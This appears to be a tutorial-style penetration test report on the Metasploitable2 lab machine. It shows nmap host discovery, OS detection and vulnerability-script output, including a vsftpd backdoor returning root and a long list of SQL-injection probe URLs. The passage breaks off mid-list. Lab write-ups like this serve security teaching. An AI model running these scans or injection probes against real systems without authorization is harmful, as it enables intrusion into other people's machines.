-->

  • Vulnerability Assessment & Penetration Testing Report Metasploitable2


    Vulnerability Assessment & Penetration Testing Report Metasploitable2



    Vulnerability Assessment & Penetration Testing Report on Metasploitable2


    Vapt or Vulnerability Assessment is the process of defining, identifying, classifying and prioritizing vulnerabilities in computer systems, application and network infrastructures and providing the organization doing the assessment with the necessary knowledge, awareness and risk background to understand the threats to its environment and react appropriately.


    Penetration testing (or pentesting) is a simulated cyber attack where professional ethical hackers break into corporate networks to find weaknesses ... before attackers do.

    It's like in the movie Sneakers, where hacker-consultants break into your corporate networks to find weaknesses before attackers do. It’s a simulated cyber attack where the pentester or ethical hacker uses the tools and techniques available to malicious hackers.



    Life Cycle of Penetration Testing:

    1] Reconnaissance

    2] Scanning

    3] Exploitation

    4] Maintaining Access



    Reconnaissance


    First, we denotes the work of information gathering before any real attacks are planned (like Reconnaissance). Recon is probably the longest phase, sometimes testing weeks or months. But here we have a know target, a Metasploitable2 machine connected to same network as on us to find the target machine we will run an Nmap scan



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo nmap -sV -sP 192.168.43.1-255 > livehosts.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$



    Here, as you can see above the command line and this is IP range that i writter there because we want to know OS details of every system connected to the network so that we can find our target machine. So first we need to sapearate out the live IP address (livehosts.txt) so we save the above result in a text file and then filter the IP address using the command.

    and then see the below comand cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt.

    Here, We have filtered the file as well as saved the output in a new file and finally our result is in front of you.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ cat livehosts.txt | grep "for" | cut -d " " -f5 > ip.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ 




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ cat ip.txt                                              
192.168.43.1
192.168.43.120
192.168.43.152
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$


    Now what we are doing now!! so, now we have to check which one of them is a metasploitable2 machine so we will run an script which will detect the OS of all the live IP's 



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo nmap -sV -O -iL ip.txt > osdetails.txt        
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ ls
ip.txt  livehosts.txt  osdetails.txt  vapt-report.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$



    Our output is here :-)



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ cat osdetails.txt                                       
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:24 IST
Nmap scan report for 192.168.43.1
Host is up (0.0026s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
53/tcp open  domain  dnsmasq 2.51
MAC Address: 2A:09:08:63:43:8D (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=7/9%OT=53%CT=1%CU=37640%PV=Y%DS=1%DC=D%G=Y%M=2A0908%TM
OS:=60E88DBB%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW8%O2=M5B4ST11NW8%O3=M5B4NNT11NW8%O4=M5B4ST11NW8%O5
OS:=M5B4ST11NW8%O6=M5B4ST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=
OS:FFFF)ECN(R=Y%DF=Y%T=40%W=FFFF%O=M5B4NNSNW8%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Network Distance: 1 hop

Nmap scan report for 192.168.43.120
Host is up (0.00071s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp   open  telnet      Linux telnetd
25/tcp   open  smtp        Postfix smtpd
53/tcp   open  domain      ISC BIND 9.4.2
80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
512/tcp  open  exec?
513/tcp  open  login
514/tcp  open  shell?
1099/tcp open  java-rmi    GNU Classpath grmiregistry
1524/tcp open  bindshell   Metasploitable root shell
2049/tcp open  nfs         2-4 (RPC #100003)
2121/tcp open  ftp         ProFTPD 1.3.1
3306/tcp open  mysql       MySQL 5.0.51a-3ubuntu5
5432/tcp open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
5900/tcp open  vnc         VNC (protocol 3.3)
6000/tcp open  X11         (access denied)
6667/tcp open  irc         UnrealIRCd
8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)
8180/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port514-TCP:V=7.91%I=7%D=7/9%Time=60E88D70%P=x86_64-pc-linux-gnu%r(NULL
SF:,37,"\x01Couldn't\x20get\x20address\x20for\x20your\x20host\x20\(KumarAt
SF:ulJaiswal\)\n");
MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Nmap scan report for 192.168.43.152
Host is up (0.000089s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6.32
OS details: Linux 2.6.32
Network Distance: 0 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 3 IP addresses (3 hosts up) scanned in 79.04 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$


    So, as you can see here are so many information retrieve like Port, Service, Version, TCP/IP fingerprint, Host, OS details, MAC address, Network distance etc.



    Vulnerability Scanning


    In this scanning part we will scan the target machine for known vulnerabilities. So again we will use Nmap to run a script which will detect vulnerabilities in the system. 




    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo nmap -Pn --script vuln 192.168.43.120 > vuln.txt
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.

    The output is here - 



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ cat vuln.txt              
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 23:31 IST
Nmap scan report for 192.168.43.120
Host is up (0.00014s latency).
Not shown: 977 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
| ftp-vsftpd-backdoor: 
|   VULNERABLE:
|   vsFTPd version 2.3.4 backdoor
|     State: VULNERABLE (Exploitable)
|     IDs:  BID:48539  CVE:CVE-2011-2523
|       vsFTPd version 2.3.4 backdoor, this was reported on 2011-07-04.
|     Disclosure date: 2011-07-03
|     Exploit results:
|       Shell command: id
|       Results: uid=0(root) gid=0(root)
|     References:
|       https://www.securityfocus.com/bid/48539
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523
|       https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
|_      http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
|_sslv2-drown: 
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://www.ietf.org/rfc/rfc2246.txt
|   
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|     IDs:  BID:74733  CVE:CVE-2015-4000
|       The Transport Layer Security (TLS) protocol contains a flaw that is
|       triggered when handling Diffie-Hellman key exchanges defined with
|       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
|       to downgrade the security of a TLS session to 512-bit export-grade
|       cryptography, which is significantly weaker, allowing the attacker
|       to more easily break the encryption and monitor or tamper with
|       the encrypted stream.
|     Disclosure date: 2015-5-19
|     Check results:
|       EXPORT-GRADE DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://www.securityfocus.com/bid/74733
|       https://weakdh.org
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|   
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: postfix builtin
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  BID:70574  CVE:CVE-2014-3566
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.securityfocus.com/bid/70574
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_      https://www.imperialviolet.org/2014/10/14/poodle.html
|_sslv2-drown: ERROR: Script execution failed (use -d to debug)
53/tcp   open  domain
80/tcp   open  http
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.43.120
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.43.120:80/dvwa/
|     Form id: 
|     Form action: login.php
|     
|     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
|     Form id: 
|     Form action: http://TWiki.org/cgi-bin/passwd/TWiki/WebHome
|     
|     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
|     Form id: 
|     Form action: http://TWiki.org/cgi-bin/passwd/Main/WebHome
|     
|     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
|     Form id: 
|     Form action: http://TWiki.org/cgi-bin/edit/TWiki/
|     
|     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
|     Form id: 
|     Form action: http://TWiki.org/cgi-bin/view/TWiki/TWikiSkins
|     
|     Path: http://192.168.43.120:80/twiki/TWikiDocumentation.html
|     Form id: 
|     Form action: http://TWiki.org/cgi-bin/manage/TWiki/ManagingWebs
|     
|     Path: http://192.168.43.120:80/mutillidae/index.php?page=register.php
|     Form id: id-bad-cred-tr
|     Form action: index.php?page=register.php
|     
|     Path: http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php
|     Form id: iddnslookupform
|     Form action: index.php?page=dns-lookup.php
|     
|     Path: http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php
|     Form id: idpollform
|_    Form action: index.php
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /tikiwiki/: Tikiwiki
|   /test/: Test page
|   /phpinfo.php: Possible information file
|   /phpMyAdmin/: phpMyAdmin
|   /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
|   /html/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
|   /icons/: Potentially interesting folder w/ directory listing
|_  /index/: Potentially interesting folder
| http-fileupload-exploiter: 
|   
|_    Couldn't find a file-type field.
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.43.120:80/dav/?C=N%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=usage-instructions.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=notes.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=php-errors.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
|     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider&page=home.php
|     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider&page=home.php
|     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9%27%20OR%20sqlspider&rev1=1.10
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9&rev1=1.10%27%20OR%20sqlspider
|     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev%27%20OR%20sqlspider&param1=1.10
|     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10%27%20OR%20sqlspider
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8%27%20OR%20sqlspider&rev1=1.9
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8&rev1=1.9%27%20OR%20sqlspider
|     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.7%27%20OR%20sqlspider
|     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.8%27%20OR%20sqlspider
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7%27%20OR%20sqlspider&rev1=1.8
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7&rev1=1.8%27%20OR%20sqlspider
|     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.9%27%20OR%20sqlspider
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7%27%20OR%20sqlspider&rev1=1.8
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.7&rev1=1.8%27%20OR%20sqlspider
|     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.7%27%20OR%20sqlspider
|     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.9%27%20OR%20sqlspider
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8%27%20OR%20sqlspider&rev1=1.9
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.8&rev1=1.9%27%20OR%20sqlspider
|     http://192.168.43.120:80/view/TWiki/TWikiHistory?rev=1.8%27%20OR%20sqlspider
|     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev%27%20OR%20sqlspider&param1=1.10
|     http://192.168.43.120:80/oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10%27%20OR%20sqlspider
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9%27%20OR%20sqlspider&rev1=1.10
|     http://192.168.43.120:80/rdiff/TWiki/TWikiHistory?rev2=1.9&rev1=1.10%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=M%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=S%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=N%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
|     http://192.168.43.120:80/dav/?C=D%3bO%3dD%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
|     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
|     http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
|     http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
